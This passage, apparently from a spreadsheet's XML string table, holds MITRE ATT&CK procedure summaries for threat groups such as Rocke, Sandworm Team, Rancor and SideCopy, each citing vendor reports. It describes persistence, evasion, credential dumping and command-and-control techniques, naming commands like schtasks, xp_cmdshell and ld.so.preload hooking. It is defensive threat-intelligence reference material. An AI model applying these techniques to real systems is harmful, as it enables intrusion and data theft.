    <t>[RTM](https://attack.mitre.org/groups/G0048) has attempted to lure victims into opening e-mail attachments to execute malicious code.(Citation: Group IB RTM August 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/groups/G0048) has used Registry run keys to establish persistence for the [RTM](https://attack.mitre.org/software/S0148) Trojan and other tools, such as a modified version of TeamViewer remote desktop software.(Citation: ESET RTM Feb 2017)(Citation: Group IB RTM August 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/groups/G0048) has used a modified version of TeamViewer and Remote Utilities for remote access.(Citation: Group IB RTM August 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/groups/G0048) has used spearphishing attachments to distribute its malware.(Citation: Group IB RTM August 2019)</t>
  </si>
  <si>
    <t>[Rancor](https://attack.mitre.org/groups/G0075) has downloaded additional malware, including by using [certutil](https://attack.mitre.org/software/S0160).(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[Rancor](https://attack.mitre.org/groups/G0075) attempted to get users to click on an embedded macro within a Microsoft Office Excel document to launch their malware.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[Rancor](https://attack.mitre.org/groups/G0075) has used &lt;code&gt;msiexec&lt;/code&gt; to download and execute malicious installer files over HTTP.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[Rancor](https://attack.mitre.org/groups/G0075) launched a scheduled task to gain persistence using the &lt;code&gt;schtasks /create /sc&lt;/code&gt; command.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[Rancor](https://attack.mitre.org/groups/G0075) has attached a malicious document to an email to gain initial access.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[Rancor](https://attack.mitre.org/groups/G0075) has used VBS scripts as well as embedded macros for execution.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[Rancor](https://attack.mitre.org/groups/G0075) has used HTTP for C2.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[Rancor](https://attack.mitre.org/groups/G0075) has used cmd.exe to execute commmands.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) issued wget requests from infected systems to the C2.(Citation: Talos Rocke August 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) has installed an "init.d" startup script to maintain persistence.(Citation: Anomali Rocke March 2019)	</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has cleared log files within the /var/log/ folder.(Citation: Anomali Rocke March 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) has compiled malware, delivered to victims as .c files, with the GNU Compiler Collection (GCC).(Citation: Anomali Rocke March 2019)	</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) installed a cron job that downloaded and executed files from the C2.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)(Citation: Anomali Rocke March 2019)</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has used Pastebin to check the version of beaconing malware and redirect to another Pastebin hosting updated malware.(Citation: Anomali Rocke March 2019)</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has extracted tar.gz files after downloading them from a C2 server.(Citation: Talos Rocke August 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) used scripts which killed processes and added firewall rules to block traffic related to other cryptominers.(Citation: Talos Rocke August 2018)	</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) used scripts which detected and uninstalled antivirus software.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.(Citation: Anomali Rocke March 2019)	</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) exploited Apache Struts, Oracle WebLogic (CVE-2017-10271), and Adobe ColdFusion (CVE-2017-3066) vulnerabilities to deliver malware.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) has deleted files on infected machines.(Citation: Anomali Rocke March 2019)	</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) downloaded a file "libprocesshider", which could hide files on the target system.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) used malware to download additional malicious files to the target system.(Citation: Talos Rocke August 2018)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) has changed file permissions of files so they could not be modified.(Citation: Anomali Rocke March 2019)	</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has used shell scripts which download mining executables and saves them with the filename "java".(Citation: Talos Rocke August 2018)</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) conducted scanning for exposed TCP port 7001 as well as SSH and Redis servers.(Citation: Talos Rocke August 2018)(Citation: Anomali Rocke March 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106)'s miner connects to a C2 server using port 51640.(Citation: Anomali Rocke March 2019)	</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has modified UPX headers after packing files to break unpackers.(Citation: Anomali Rocke March 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106)'s miner, "TermsHost.exe", evaded defenses by injecting itself into Windows processes, including Notepad.exe.(Citation: Talos Rocke August 2018)	</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has used SSH private keys on the infected machine to spread its coinminer throughout a network.(Citation: Anomali Rocke March 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) can detect a running process's PID on the infected machine.(Citation: Anomali Rocke March 2019)	</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has used Python-based malware to install and spread their coinminer.(Citation: Anomali Rocke March 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106)'s miner has created UPX-packed files in the Windows Start Menu Folder.(Citation: Talos Rocke August 2018)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) has looked for IP addresses in the known_hosts file on the infected system and attempted to SSH into them.(Citation: Talos Rocke August 2018)	</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has distributed cryptomining malware.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.(Citation: Anomali Rocke March 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) has spread its coinminer via SSH.(Citation: Anomali Rocke March 2019)	</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106)'s miner has created UPX-packed files in the Windows Start Menu Folder.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)(Citation: Anomali Rocke March 2019)</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has used uname -m to collect the name and information about the infected system's kernel.(Citation: Anomali Rocke March 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) has installed a systemd service script to maintain persistence.(Citation: Anomali Rocke March 2019)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) has changed the time stamp of certain files.(Citation: Anomali Rocke March 2019)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) used shell scripts to run commands which would obtain persistence and execute the cryptocurrency mining malware.(Citation: Talos Rocke August 2018)	</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has executed wget and curl commands to Pastebin over the HTTPS protocol.(Citation: Anomali Rocke March 2019)</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has used Pastebin, Gitee, and GitLab for Command and Control.(Citation: Anomali Rocke March 2019)(Citation: Talos Rocke August 2018)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) used the &lt;code&gt;sp_addlinkedsrvlogin&lt;/code&gt; command in MS-SQL to create a link between a created account and other servers in the network.(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used the Telegram Bot API from Telegram Messenger to send and receive commands to its Python backdoor. [Sandworm Team](https://attack.mitre.org/groups/G0034) also used legitimate M.E.Doc software update check requests for sending and receiving commands and hosted malicious payloads on putdrive.com.(Citation: ESET Telebots Dec 2016)(Citation: ESET Telebots June 2017)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used a large-scale botnet to target Small Office/Home Office (SOHO) network devices.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>In preparation for its attack against the 2018 Winter Olympics, [Sandworm Team](https://attack.mitre.org/groups/G0034) conducted online research of partner organizations listed on an official PyeongChang Olympics partnership site.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has distributed [NotPetya](https://attack.mitre.org/software/S0368) by compromising the legitimate Ukrainian accounting software M.E.Doc and replacing a legitimate software update with a malicious one.(Citation: Secureworks NotPetya June 2017)(Citation: ESET Telebots June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) added a login to a SQL Server with &lt;code&gt;sp_addlinkedsrvlogin&lt;/code&gt;.(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034)'s CredRaptor tool can collect saved passwords from various internet browsers.(Citation: ESET Telebots Dec 2016)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used the [BlackEnergy](https://attack.mitre.org/software/S0089) KillDisk component to overwrite files on Windows-based Human-Machine Interfaces. (Citation: US-CERT Ukraine Feb 2016)(Citation: ESET Telebots June 2017)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has exfiltrated internal documents, files, and other data from compromised hosts.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034)'s VBS backdoor can decode Base64-encoded data and save it to the %TEMP% folder. The group also decrypted received information using the Triple DES algorithm and decompresses it using GZip.(Citation: ESET Telebots Dec 2016)(Citation: ESET Telebots July 2017)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has disabled event logging on compromised systems.(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used the [BlackEnergy](https://attack.mitre.org/software/S0089) KillDisk component to corrupt the infected system's master boot record.(Citation: US-CERT Ukraine Feb 2016)(Citation: ESET Telebots June 2017)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has created new domain accounts on an ICS access server.(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) has used a tool to query Active Directory using LDAP, discovering information about usernames listed in AD.(Citation: ESET Telebots Dec 2016)	</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used stolen credentials to access administrative accounts within the domain.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) conducted technical reconnaissance of the Parliament of Georgia's official internet domain prior to its 2019 attack.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has registered domain names and created URLs that are often designed to mimic or spoof legitimate websites, such as email login pages, online file sharing and storage websites, and password reset pages.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) used malware to enumerate email settings, including usernames and passwords, from the M.E.Doc application.(Citation: ESET Telebots July 2017)	</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has created email accounts that mimic legitimate organizations for its spearphishing operations.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has obtained valid emails addresses while conducting research against target organizations that were subsequently used in spearphishing campaigns.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034)'s research of potential victim organizations included the identification and collection of employee information.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) temporarily disrupted service to Georgian government, non-government, and private sector websites after compromising a Georgian web hosting provider in 2019.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) has sent system information to its C2 server using HTTP.(Citation: ESET Telebots Dec 2016)	</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has exploited vulnerabilities in Microsoft PowerPoint via OLE objects (CVE-2014-4114) and Microsoft Word via crafted TIFF images (CVE-2013-3906).(Citation: iSight Sandworm Oct 2014)(Citation: TrendMicro Sandworm October 2014)(Citation: McAfee Sandworm November 2013)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) defaced approximately 15,000 websites belonging to Georgian government, non-government, and private sector organizations in 2019.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used Dropbear SSH with a hardcoded backdoor password to maintain persistence within the target network. [Sandworm Team](https://attack.mitre.org/groups/G0034) has also used VPN tunnels established in legitimate software company infrastructure to gain access to internal networks of that software company's users.(Citation: ESET BlackEnergy Jan 2016)(Citation: ESET Telebots June 2017)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used backdoors that can delete files used in an attack from an infected system.(Citation: ESET Telebots Dec 2016)(Citation: ESET Telebots July 2017)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has enumerated files on a compromised host.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has pushed additional malicious tools onto an infected system to steal user credentials, move laterally, and destroy data.(Citation: ESET Telebots Dec 2016)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) has used a keylogger to capture keystrokes by using the SetWindowsHookEx function.(Citation: ESET Telebots Dec 2016)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034)'s plainpwd tool is a modified version of [Mimikatz](https://attack.mitre.org/software/S0002) and dumps Windows credentials from system memory.(Citation: ESET Telebots Dec 2016)(Citation: ESET Telebots June 2017)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) has used `move` to transfer files to a network share.(Citation: Dragos Crashoverride 2018) </t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has tricked unwitting recipients into clicking on spearphishing attachments and enabling malicious macros embedded within files.(Citation: ESET Telebots Dec 2016)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has tricked unwitting recipients into clicking on malicious hyperlinks within emails crafted to resemble trustworthy senders.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has developed malware for its operations, including malicious mobile applications and destructive malware such as [NotPetya](https://attack.mitre.org/software/S0368) and [Olympic Destroyer](https://attack.mitre.org/software/S0365).(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has avoided detection by naming a malicious binary explorer.exe.(Citation: ESET Telebots Dec 2016)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) has used intercepter-NG to sniff passwords in network traffic.(Citation: ESET Telebots Dec 2016)	</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used port 6789 to accept connections on the group's SSH server.(Citation: ESET BlackEnergy Jan 2016)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used Base64 encoding within malware variants. [Sandworm Team](https://attack.mitre.org/groups/G0034) has also used ROT13 encoding, AES encryption and compression with the zlib library for their Python-based backdoor.(Citation: iSight Sandworm Oct 2014)(Citation: ESET Telebots Dec 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) has used a script to attempt RPC authentication against a number of hosts.(Citation: Dragos Crashoverride 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) has used PowerShell scripts to run a credential harvesting tool in memory to evade defenses.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: Dragos Crashoverride 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034)'s BCS-server tool can create an internal proxy server to redirect traffic from the adversary-controlled C2 to internal servers which may not be connected to the internet, but are interconnected locally.(Citation: ESET Telebots Dec 2016)	</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used remote administration tools or remote industrial control system client software to maliciously release electricity breakers.(Citation: US-CERT Ukraine Feb 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) has used a tool to query Active Directory using LDAP, discovering information about computers listed in AD.(Citation: ESET Telebots Dec 2016)(Citation: Dragos Crashoverride 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) used a backdoor which could execute a supplied DLL using rundll32.exe.(Citation: ESET Telebots July 2017)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) has run &lt;code&gt;net use&lt;/code&gt; to connect to network shares.(Citation: Dragos Crashoverride 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) has used various MS-SQL stored procedures.(Citation: Dragos Crashoverride 2018) 
</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) researched Ukraine's unique legal entity identifier (called an "EDRPOU" number), including running queries on the EDRPOU website, in preparation for the [NotPetya](https://attack.mitre.org/software/S0368) attack. [Sandworm Team](https://attack.mitre.org/groups/G0034) has also researched third-party websites to help it craft credible spearphishing emails.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has conducted research against potential victim websites as part of its operational planning.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has leased servers from resellers instead of leasing infrastructure directly from hosting companies to enable its operations.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has established social media accounts to disseminate victim internal-only documents and other sensitive data.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has researched software code to enable supply-chain operations, most notably for the 2017 [NotPetya](https://attack.mitre.org/software/S0368) attack. [Sandworm Team](https://attack.mitre.org/groups/G0034) also collected a list of computers using specific software as part of its targeting efforts.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) used UPX to pack a copy of [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Dragos Crashoverride 2018) </t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has delivered malicious Microsoft Office attachments via spearphishing emails.(Citation: iSight Sandworm Oct 2014)(Citation: US-CERT Ukraine Feb 2016)(Citation: ESET Telebots Dec 2016)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has crafted phishing emails containing malicious hyperlinks.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has crafted spearphishing emails with hyperlinks designed to trick unwitting recipients into revealing their account credentials.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034)'s BCS-server tool uses base64 encoding and HTML tags for the communication traffic between the C2 server.(Citation: ESET Telebots Dec 2016)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) used a backdoor to enumerate information about the infected system's operating system.(Citation: ESET Telebots July 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) checks for connectivity to other resources in the network.(Citation: Dragos Crashoverride 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) had gathered user, IP address, and server data related to RDP sessions on a compromised host. It has also accessed network diagram files useful for understanding how a host's network was configured.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: Dragos Crashoverride 2018) </t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has collected the username from a compromised host.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has acquired open-source tools for some of it's operations; for example it acquired [Invoke-PSImage](https://attack.mitre.org/software/S0231) to establish an encrypted channel from a compromised host to [Sandworm Team](https://attack.mitre.org/groups/G0034)'s C2 server as part of its preparation for the 2018 Winter Olympics attack.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used dedicated network connections from one victim organization to gain unauthorized access to a separate organization.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) have used previously acquired legitimate credentials prior to attacks.(Citation: US-CERT Ukraine Feb 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) has created VBScripts to run an SSH server.(Citation: ESET BlackEnergy Jan 2016)(Citation: ESET Telebots Dec 2016)(Citation: ESET Telebots June 2017)(Citation: Dragos Crashoverride 2018) </t>
  </si>
  <si>
    <t>In 2017, [Sandworm Team](https://attack.mitre.org/groups/G0034) conducted technical research related to vulnerabilities associated with websites used by the Korean Sport and Olympic Committee, a Korean power company, and a Korean airport.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has scanned network infrastructure for vulnerabilities as part of its operational planning.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034)'s BCS-server tool connects to the designated C2 server via HTTP.(Citation: ESET Telebots Dec 2016)	</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used webshells including [P.A.S. Webshell](https://attack.mitre.org/software/S0598) to maintain access to victim networks.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) has run the  &lt;code&gt;xp_cmdshell&lt;/code&gt; command in MS-SQL.(Citation: Dragos Crashoverride 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) has used VBScript to run WMI queries.(Citation: Dragos Crashoverride 2018) </t>
  </si>
  <si>
    <t>[Scarlet Mimic](https://attack.mitre.org/groups/G0029) has used the left-to-right override character in self-extracting RAR archive spearphishing attachment file names.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has used a malicious loader DLL file to execute the `credwiz.exe` process and side-load the malicious payload `Duser.dll`.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has compromised domains for some of their infrastructure, including for C2 and staging malware.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has delivered trojanized executables via spearphishing emails that contacts actor-controlled servers to download malicious payloads.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has attempted to lure victims into clicking on malicious embedded archive files sent via spearphishing campaigns.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has used a legitimate DLL file name, `Duser.dll` to disguise a malicious remote access tool.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has utilized `mshta.exe` to execute a malicious hta file.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t xml:space="preserve"> [SideCopy](https://attack.mitre.org/groups/G1008) has executed malware by calling the API function `CreateProcessW`.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) uses a loader DLL file to collect AV product names from an infected host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has collected browser information from a compromised host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has sent spearphishing emails with malicious hta file attachments.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has crafted generic lures for spam campaigns to collect emails and credentials for targeting efforts.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has identified the OS version of a compromised host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has identified the country location of a compromised host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has identified the IP address of a compromised host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has used compromised domains to host its malicious payloads.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has sent Microsoft Office Publisher documents to victims that have embedded malicious macros that execute an hta file via calling `mshta.exe`.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used tools to automatically collect system and network configuration information.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has configured tools to automatically send collected files to attacker controlled servers.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used DLL side-loading to drop and execute malicious payloads including the hijacking of the legitimate Windows application file rekeywiz.exe.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used the ActiveXObject utility to create OLE objects to obtain execution through Internet Explorer.(Citation: Rewterz Sidewinder APT April 2020)(Citation: Rewterz Sidewinder COVID-19 June 2020)</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has exploited vulnerabilities to gain execution including CVE-2017-11882 and CVE-2020-0674.(Citation: ATT Sidewinder January 2021)(Citation: Cyble Sidewinder September 2020)</t>
  </si>
  <si>
